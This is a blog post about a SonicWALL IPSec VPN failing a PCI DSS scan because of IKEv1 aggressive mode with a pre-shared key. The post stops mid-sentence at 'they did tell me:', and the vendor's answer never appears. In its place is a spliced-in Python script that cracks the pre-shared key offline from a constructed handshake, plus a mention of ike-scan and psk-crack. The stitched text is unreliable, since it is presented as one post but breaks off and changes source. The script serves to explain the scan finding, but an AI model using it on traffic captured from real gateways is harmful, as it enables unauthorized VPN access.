Fixing a PCI DSS scan failure on the SonicWALL IPSec VPN, part one

An IPSec VPN that uses a pre-shared secret for authentication will fail PCI DSS security scans. Here's how to switch to using certificates on the router and the VPN client to pass the scan.

In my previous post on passing Payment Card Industry Data Security Standard (PCI DSS) external vulnerability scans I mentioned two unresolved scan failures, both connected with VPN access. In one case, the SSL VPN appliance, there was no solution with the existing hardware. Although we’re still running that box, its days are numbered. The second problem was with the IPSec VPN (sometimes referred to as a “normal” or “traditional” VPN to distinguish it from Secure Sockets Layer, or SSL, VPN) on our SonicWALL router. The users testing it out had found it faster and more reliable than the SSL VPN, so I really wanted to keep it. The problem was that solving the scan failure looked horrendously complicated.

To begin with, what’s the problem? The PCI DSS scan reported this:

Synopsis: The remote IKEv1 service supports Aggressive Mode with Pre-Shared key.

Impact: The remote Internet Key Exchange (IKE) version 1 service seems to support Aggressive Mode with Pre-Shared key (PSK) authentication. Such configuration could allow an attacker to capture and crack the PSK of a VPN gateway and gain unauthorized access to private networks.

– Do not use Pre-Shared key for authentication if possible.
– If using Pre-Shared key cannot be avoided, use very strong keys.
– If possible, do not allow VPN connections from any IP addresses.

I smiled at the advice to “use very strong keys”, because the security scan is automated and will fail on this issue no matter how strong the key is. What didn’t make me smile, however, was the fact that this vulnerability has been known for over 10 years (that’s what the CVE number tells you). Why does the SonicWALL even allow such a vulnerable configuration? When I logged the problem with SonicWALL, they didn’t answer that question, but they did tell me:
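The scanner's Impact text is not hypothetical. In IKEv1 aggressive mode the gateway returns its authentication hash (HASH_R) in the clear in the second message, before it has verified the client, and that hash is computed from the pre-shared key plus values both sides have already exchanged unencrypted. Anyone who can send the first message can therefore brute-force the PSK offline, which is exactly why "use very strong keys" only raises the attacker's cost. The following Python script is an added example, not code from the original post or from SonicWALL: it builds a constructed aggressive-mode exchange following RFC 2409 (HMAC-SHA1 as the prf, pre-shared-key authentication) with a known PSK, then recovers that PSK from HASH_R with a dictionary attack. All cookies, nonces, Diffie-Hellman values, the SA body and the 203.0.113.1 gateway identity are made-up stand-ins, and nothing touches a network.

```python
"""Why the PCI scanner flags IKEv1 aggressive mode with a pre-shared key.

Added example, not code from the original post or from SonicWALL. It
constructs an IKEv1 aggressive-mode exchange (RFC 2409, section 5.4,
pre-shared-key authentication) with a known PSK, then recovers that PSK
from the responder's HASH_R by an offline dictionary attack, using only
values the responder sends in the clear. All keys, nonces, cookies and
Diffie-Hellman values are made-up stand-ins; nothing touches a network.
"""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf when SHA-1 is the negotiated hash algorithm: HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)  (RFC 2409, section 5)."""
    return prf(psk, ni_b + nr_b)


def hash_r(skeyid: bytes, cap: Dict[str, bytes]) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return prf(skeyid, cap["gxr"] + cap["gxi"] + cap["cky_r"] + cap["cky_i"]
               + cap["sai_b"] + cap["idir_b"])


def aggressive_mode_capture(psk: bytes) -> Dict[str, bytes]:
    """What an initiator learns from aggressive-mode messages 1 and 2.

    Message 1 (ours): SA, KE (g^xi), Ni, IDii.  Message 2 (gateway):
    SA, KE (g^xr), Nr, IDir, HASH_R, all unencrypted.  The gateway computes
    HASH_R from the PSK *before* it has authenticated us, so no valid PSK
    is needed to obtain it.  Constructed stand-in values: 8-byte cookies,
    1024-bit (DH group 2) public values, 20-byte nonces, a fake SA payload
    body and an IPv4 ID payload body (type 1, proto 0, port 0) for 203.0.113.1.
    """
    cap = {
        "cky_i": os.urandom(8),
        "cky_r": os.urandom(8),
        "gxi": os.urandom(128),
        "gxr": os.urandom(128),
        "ni_b": os.urandom(20),
        "nr_b": os.urandom(20),
        "sai_b": bytes.fromhex("0000000100000001") + os.urandom(24),
        "idir_b": bytes([0x01, 0x00, 0x00, 0x00]) + bytes([203, 0, 113, 1]),
    }
    cap["hash_r"] = hash_r(skeyid_psk(psk, cap["ni_b"], cap["nr_b"]), cap)
    return cap


def crack_psk(cap: Dict[str, bytes], candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R for each guess.

    Every input except the PSK is in `cap`, so no further packets are sent
    and the gateway logs nothing.  This is the attack the scanner's Impact
    text describes; a stronger key only makes the loop run longer.
    """
    for guess in candidates:
        if hash_r(skeyid_psk(guess, cap["ni_b"], cap["nr_b"]), cap) == cap["hash_r"]:
            return guess
    return None


if __name__ == "__main__":
    capture = aggressive_mode_capture(b"sonicwall123")      # the gateway's real PSK
    wordlist = [b"password", b"letmein", b"sonicwall", b"sonicwall123"]
    print("recovered PSK:", crack_psk(capture, wordlist))  # b'sonicwall123'
```

Against a real gateway this is what ike-scan's aggressive-mode probe followed by psk-crack does, and the scanner only needs to see the gateway answer an aggressive-mode proposal to raise the finding. Main mode does not give this away: the responder's hash is sent encrypted, and only after it has checked the initiator's own hash, so each PSK guess there costs a full exchange with the gateway instead of one HMAC offline. Certificate authentication, the fix this post series goes on to set up, removes the shared secret from the hash altogether.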